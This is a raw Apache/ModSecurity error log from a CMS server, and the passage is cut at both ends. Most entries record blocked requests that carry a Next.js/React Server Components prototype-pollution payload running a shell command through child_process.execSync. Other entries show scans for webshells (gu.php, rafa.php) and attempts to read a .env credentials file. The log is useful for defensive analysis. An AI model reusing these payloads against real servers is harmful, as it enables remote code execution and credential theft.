\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCagX3f0uFs60XqYIgEgQAAAZg"] [Wed Mar 11 00:26:09.885199 2026] [:error] [pid 8198:tid 8210] [client 54.180.255.94:59326] [client 54.180.255.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCagX3f0uFs60XqYIgEggAAAYo"] [Wed Mar 11 00:26:10.115977 2026] [:error] [pid 8198:tid 8224] [client 54.180.255.94:59326] [client 54.180.255.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCagn3f0uFs60XqYIgEgwAAAZc"] [Wed Mar 11 02:11:51.898108 2026] [:error] [pid 8091:tid 8109] [client 15.134.136.147:53482] [client 15.134.136.147] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCzR_MmESTk3DzpxpOOHwAAAU8"] [Wed Mar 11 02:11:52.174665 2026] [:error] [pid 8091:tid 8118] [client 15.134.136.147:53482] [client 15.134.136.147] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCzSPMmESTk3DzpxpOOIQAAAVg"] [Wed Mar 11 02:11:52.458086 2026] [:error] [pid 8091:tid 8113] [client 15.134.136.147:53482] [client 15.134.136.147] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abCzSPMmESTk3DzpxpOOIwAAAVM"] [Wed Mar 11 02:30:59.463701 2026] [:error] [pid 9890:tid 9916] [client 54.169.85.108:51100] [client 54.169.85.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "abC3w1maKwZLSSYTr4fe6wAAABY"] [Wed Mar 11 02:30:59.619562 2026] [:error] [pid 9890:tid 9898] [client 54.169.85.108:51100] [client 54.169.85.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "abC3w1maKwZLSSYTr4fe7AAAAAQ"] [Wed Mar 11 02:30:59.782493 2026] [:error] [pid 9890:tid 9900] [client 54.169.85.108:51100] [client 54.169.85.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "abC3w1maKwZLSSYTr4fe7QAAAAY"] [Wed Mar 11 04:41:59.095177 2026] [:error] [pid 16657:tid 16738] [client 20.151.211.215:36586] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/gu.php [Wed Mar 11 04:41:59.194163 2026] [:error] [pid 16657:tid 16743] [client 20.151.211.215:36586] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/rafa.php [Wed Mar 11 04:51:48.192062 2026] [:error] [pid 16659:tid 16774] [client 40.70.24.180:2176] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/gu.php [Wed Mar 11 04:51:48.293064 2026] [:error] [pid 16659:tid 16788] [client 40.70.24.180:2176] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/rafa.php [Wed Mar 11 19:42:55.393259 2026] [access_compat:error] [pid 16659:tid 16788] [client 103.158.121.29:52454] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Wed Mar 11 19:43:25.571282 2026] [access_compat:error] [pid 1840:tid 1917] [client 103.158.121.29:50712] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Wed Mar 11 21:33:10.002679 2026] [access_compat:error] [pid 1840:tid 1924] [client 103.158.121.26:38460] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Wed Mar 11 21:33:31.424406 2026] [access_compat:error] [pid 16659:tid 16797] [client 103.158.121.26:33312] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Thu Mar 12 04:00:34.132981 2026] [access_compat:error] [pid 808:tid 838] [client 103.158.121.28:33070] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Thu Mar 12 04:00:54.243178 2026] [access_compat:error] [pid 1149:tid 1177] [client 103.158.121.28:51578] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Thu Mar 12 06:10:50.418602 2026] [:error] [pid 614:tid 782] [client 35.183.244.59:47330] [client 35.183.244.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abI8yi81Pr86t76NLAhiIwAAAQ4"] [Thu Mar 12 06:10:50.560380 2026] [:error] [pid 614:tid 781] [client 35.183.244.59:47330] [client 35.183.244.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abI8yi81Pr86t76NLAhiJAAAAQ0"] [Thu Mar 12 06:10:50.657767 2026] [:error] [pid 614:tid 788] [client 35.183.244.59:47330] [client 35.183.244.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abI8yi81Pr86t76NLAhiJgAAARQ"] [Thu Mar 12 06:35:28.827455 2026] [:error] [pid 614:tid 785] [client 35.81.169.205:60380] [client 35.81.169.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "abJCkC81Pr86t76NLAhw9AAAARE"] [Thu Mar 12 06:35:28.985335 2026] [:error] [pid 614:tid 786] [client 35.81.169.205:60380] [client 35.81.169.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "abJCkC81Pr86t76NLAhw9gAAARI"] [Thu Mar 12 06:35:29.149993 2026] [:error] [pid 614:tid 791] [client 35.81.169.205:60380] [client 35.81.169.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "abJCkS81Pr86t76NLAhw9wAAARc"] [Thu Mar 12 07:00:29.920818 2026] [:error] [pid 1149:tid 1188] [client 99.79.40.105:52436] [client 99.79.40.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abJIbfIvXdYK816VHjLYDwAAABI"] [Thu Mar 12 07:00:30.005476 2026] [:error] [pid 1149:tid 1176] [client 99.79.40.105:52436] [client 99.79.40.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abJIbvIvXdYK816VHjLYEAAAAAY"] [Thu Mar 12 07:00:30.097087 2026] [:error] [pid 1149:tid 1175] [client 99.79.40.105:52436] [client 99.79.40.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abJIbvIvXdYK816VHjLYEQAAAAU"] [Thu Mar 12 09:05:22.594875 2026] [core:error] [pid 619:tid 669] [client 74.7.241.30:53388] AH10244: invalid URI path (/assets/front/js/%url%), referer: https://cms-1.dev-unit.com/assets/front/js/jquery.magnific-popup.min.js [Thu Mar 12 19:47:34.849824 2026] [:error] [pid 1149:tid 1187] [client 194.180.48.253:42330] [client 194.180.48.253] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-20239"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag 